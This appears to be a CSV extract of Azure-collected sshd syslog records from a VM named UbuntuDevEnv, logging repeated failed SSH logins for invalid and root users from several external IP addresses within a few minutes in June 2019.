+10626,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:45:55,UbuntuDevEnv,2019-06-25 23:45:54,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=88.247.110.88,63179,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,88.247.110.8,,0,
+10627,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:45:57,UbuntuDevEnv,2019-06-25 23:45:57,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 88.247.110.88 port 51615 ssh2,63179,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,88.247.110.8,51615,,
+10628,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:45:58,UbuntuDevEnv,2019-06-25 23:45:58,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 88.247.110.88 port 51615 [preauth],63179,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,88.247.110.8,51615,,
+10629,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:45:58,UbuntuDevEnv,2019-06-25 23:45:58,auth,UbuntuDevEnv,info,Received disconnect from 88.247.110.88 port 51615:11: Bye Bye [preauth],63179,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,88.247.110.8,51615,,
+10630,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:46:03,UbuntuDevEnv,2019-06-25 23:46:02,auth,UbuntuDevEnv,info,Invalid user villepinte from 196.27.127.61 port 34172,63209,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,villepinte,196.27.127.6,34172,,
+10631,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:46:03,UbuntuDevEnv,2019-06-25 23:46:02,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.27.127.61,63209,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.27.127.6,,0,
+10632,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:46:03,UbuntuDevEnv,2019-06-25 23:46:02,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,63209,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10633,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:46:05,UbuntuDevEnv,2019-06-25 23:46:04,auth,UbuntuDevEnv,info,Failed password for invalid user villepinte from 196.27.127.61 port 34172 ssh2,63209,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,villepinte,196.27.127.6,34172,,
+10634,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:46:05,UbuntuDevEnv,2019-06-25 23:46:04,auth,UbuntuDevEnv,info,Disconnected from invalid user villepinte 196.27.127.61 port 34172 [preauth],63209,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,villepinte,196.27.127.6,34172,,
+10635,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:46:05,UbuntuDevEnv,2019-06-25 23:46:04,auth,UbuntuDevEnv,info,Received disconnect from 196.27.127.61 port 34172:11: Bye Bye [preauth],63209,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.27.127.6,34172,,
+10636,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:46:16,UbuntuDevEnv,2019-06-25 23:46:15,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=203.195.235.135,63253,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,203.195.235.1,,0,
+10637,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:46:16,UbuntuDevEnv,2019-06-25 23:46:15,auth,UbuntuDevEnv,info,Invalid user sq from 203.195.235.135 port 42376,63253,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sq,203.195.235.1,42376,,
+10638,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:46:16,UbuntuDevEnv,2019-06-25 23:46:15,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,63253,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10639,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:46:17,UbuntuDevEnv,2019-06-25 23:46:17,auth,UbuntuDevEnv,info,Failed password for invalid user sq from 203.195.235.135 port 42376 ssh2,63253,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sq,203.195.235.1,42376,,
+10640,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:46:18,UbuntuDevEnv,2019-06-25 23:46:17,auth,UbuntuDevEnv,info,Disconnected from invalid user sq 203.195.235.135 port 42376 [preauth],63253,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sq,203.195.235.1,42376,,
+10641,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:46:18,UbuntuDevEnv,2019-06-25 23:46:17,auth,UbuntuDevEnv,info,Received disconnect from 203.195.235.135 port 42376:11: Bye Bye [preauth],63253,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,203.195.235.1,42376,,
+10642,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:47:13,UbuntuDevEnv,2019-06-25 23:47:12,auth,UbuntuDevEnv,info,Invalid user raja from 203.195.235.135 port 51676,63454,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,raja,203.195.235.1,51676,,
+10643,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:47:13,UbuntuDevEnv,2019-06-25 23:47:12,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,63454,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10644,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:47:13,UbuntuDevEnv,2019-06-25 23:47:12,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=203.195.235.135,63454,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,203.195.235.1,,0,
+10645,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:47:14,UbuntuDevEnv,2019-06-25 23:47:14,auth,UbuntuDevEnv,info,Failed password for invalid user raja from 203.195.235.135 port 51676 ssh2,63454,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,raja,203.195.235.1,51676,,
+10646,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:47:14,UbuntuDevEnv,2019-06-25 23:47:14,auth,UbuntuDevEnv,info,Disconnected from invalid user raja 203.195.235.135 port 51676 [preauth],63454,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,raja,203.195.235.1,51676,,
+10647,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:47:14,UbuntuDevEnv,2019-06-25 23:47:14,auth,UbuntuDevEnv,info,Received disconnect from 203.195.235.135 port 51676:11: Bye Bye [preauth],63454,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,203.195.235.1,51676,,
+10648,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:47:15,UbuntuDevEnv,2019-06-25 23:47:15,auth,UbuntuDevEnv,info,Invalid user zd from 138.68.12.43 port 48934,63462,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zd,138.68.12.4,48934,,
+10649,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:47:15,UbuntuDevEnv,2019-06-25 23:47:15,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.12.43,63462,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.12.4,,0,
+10650,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:47:15,UbuntuDevEnv,2019-06-25 23:47:15,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,63462,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10651,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:47:18,UbuntuDevEnv,2019-06-25 23:47:17,auth,UbuntuDevEnv,info,Failed password for invalid user zd from 138.68.12.43 port 48934 ssh2,63462,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zd,138.68.12.4,48934,,
+10652,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:47:18,UbuntuDevEnv,2019-06-25 23:47:17,auth,UbuntuDevEnv,info,Disconnected from invalid user zd 138.68.12.43 port 48934 [preauth],63462,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zd,138.68.12.4,48934,,
+10653,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:47:18,UbuntuDevEnv,2019-06-25 23:47:17,auth,UbuntuDevEnv,info,Received disconnect from 138.68.12.43 port 48934:11: Bye Bye [preauth],63462,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.12.4,48934,,
+10654,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:47:32,UbuntuDevEnv,2019-06-25 23:47:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=88.247.110.88  user=root,63604,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,88.247.110.8,,0,
+10655,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:47:33,UbuntuDevEnv,2019-06-25 23:47:33,auth,UbuntuDevEnv,info,Failed password for root from 88.247.110.88 port 62403 ssh2,63604,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,88.247.110.8,62403,,
+10656,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:47:33,UbuntuDevEnv,2019-06-25 23:47:33,auth,UbuntuDevEnv,info,Received disconnect from 88.247.110.88 port 62403:11: Bye Bye [preauth],63604,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,88.247.110.8,62403,,
+10657,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:47:33,UbuntuDevEnv,2019-06-25 23:47:33,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 88.247.110.88 port 62403 [preauth],63604,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,88.247.110.8,62403,,
+10658,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:47:35,UbuntuDevEnv,2019-06-25 23:47:34,auth,UbuntuDevEnv,info,Invalid user remi from 114.112.81.180 port 58316,63603,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,remi,114.112.81.1,58316,,
+10659,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:47:35,UbuntuDevEnv,2019-06-25 23:47:34,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,63603,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10660,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:47:35,UbuntuDevEnv,2019-06-25 23:47:34,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=114.112.81.180,63603,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,114.112.81.1,,0,
+10661,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:47:37,UbuntuDevEnv,2019-06-25 23:47:36,auth,UbuntuDevEnv,info,Failed password for invalid user remi from 114.112.81.180 port 58316 ssh2,63603,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,remi,114.112.81.1,58316,,
+10662,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:47:37,UbuntuDevEnv,2019-06-25 23:47:36,auth,UbuntuDevEnv,info,Disconnected from invalid user remi 114.112.81.180 port 58316 [preauth],63603,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,remi,114.112.81.1,58316,,
+10663,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:47:37,UbuntuDevEnv,2019-06-25 23:47:36,auth,UbuntuDevEnv,info,Received disconnect from 114.112.81.180 port 58316:11: Bye Bye [preauth],63603,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,114.112.81.1,58316,,
+10664,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:48:00,UbuntuDevEnv,2019-06-25 23:47:59,auth,UbuntuDevEnv,info,Invalid user nginx from 196.27.127.61 port 42493,63705,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nginx,196.27.127.6,42493,,
+10665,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:48:00,UbuntuDevEnv,2019-06-25 23:47:59,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.27.127.61,63705,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.27.127.6,,0,
+10666,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:48:00,UbuntuDevEnv,2019-06-25 23:47:59,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,63705,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10667,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:48:01,UbuntuDevEnv,2019-06-25 23:48:01,auth,UbuntuDevEnv,info,Failed password for invalid user nginx from 196.27.127.61 port 42493 ssh2,63705,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nginx,196.27.127.6,42493,,
+10668,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:48:02,UbuntuDevEnv,2019-06-25 23:48:01,auth,UbuntuDevEnv,info,Received disconnect from 196.27.127.61 port 42493:11: Bye Bye [preauth],63705,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.27.127.6,42493,,
+10669,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:48:02,UbuntuDevEnv,2019-06-25 23:48:01,auth,UbuntuDevEnv,info,Disconnected from invalid user nginx 196.27.127.61 port 42493 [preauth],63705,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nginx,196.27.127.6,42493,,
+10670,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:48:09,UbuntuDevEnv,2019-06-25 23:48:09,auth,UbuntuDevEnv,info,Invalid user acogec from 203.195.235.135 port 60810,63745,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,acogec,203.195.235.1,60810,,
+10671,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:48:10,UbuntuDevEnv,2019-06-25 23:48:09,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=203.195.235.135,63745,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,203.195.235.1,,0,
+10672,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:48:10,UbuntuDevEnv,2019-06-25 23:48:09,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,63745,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10673,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:48:12,UbuntuDevEnv,2019-06-25 23:48:11,auth,UbuntuDevEnv,info,Failed password for invalid user acogec from 203.195.235.135 port 60810 ssh2,63745,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,acogec,203.195.235.1,60810,,
+10674,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:48:12,UbuntuDevEnv,2019-06-25 23:48:12,auth,UbuntuDevEnv,info,Received disconnect from 203.195.235.135 port 60810:11: Bye Bye [preauth],63745,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,203.195.235.1,60810,,
+10675,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:48:12,UbuntuDevEnv,2019-06-25 23:48:12,auth,UbuntuDevEnv,info,Disconnected from invalid user acogec 203.195.235.135 port 60810 [preauth],63745,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,acogec,203.195.235.1,60810,,
+10676,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:49:09,UbuntuDevEnv,2019-06-25 23:49:08,auth,UbuntuDevEnv,info,Invalid user bmueni from 203.195.235.135 port 41726,63950,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bmueni,203.195.235.1,41726,,
+10677,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:49:09,UbuntuDevEnv,2019-06-25 23:49:08,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=203.195.235.135,63950,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,203.195.235.1,,0,
+10678,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:49:09,UbuntuDevEnv,2019-06-25 23:49:08,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,63950,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10679,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:49:11,UbuntuDevEnv,2019-06-25 23:49:10,auth,UbuntuDevEnv,info,Failed password for invalid user bmueni from 203.195.235.135 port 41726 ssh2,63950,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bmueni,203.195.235.1,41726,,
+10680,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:49:11,UbuntuDevEnv,2019-06-25 23:49:11,auth,UbuntuDevEnv,info,Disconnected from invalid user bmueni 203.195.235.135 port 41726 [preauth],63950,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bmueni,203.195.235.1,41726,,
+10681,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:49:11,UbuntuDevEnv,2019-06-25 23:49:11,auth,UbuntuDevEnv,info,Received disconnect from 203.195.235.135 port 41726:11: Bye Bye [preauth],63950,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,203.195.235.1,41726,,
+10682,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:49:12,UbuntuDevEnv,2019-06-25 23:49:11,auth,UbuntuDevEnv,info,Invalid user noc from 88.247.110.88 port 39088,63962,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,noc,88.247.110.8,39088,,
+10683,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:49:12,UbuntuDevEnv,2019-06-25 23:49:11,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=88.247.110.88,63962,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,88.247.110.8,,0,
+10684,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:49:12,UbuntuDevEnv,2019-06-25 23:49:11,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,63962,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10685,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:49:13,UbuntuDevEnv,2019-06-25 23:49:12,auth,UbuntuDevEnv,info,Invalid user share from 114.112.81.180 port 49038,63965,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,share,114.112.81.1,49038,,
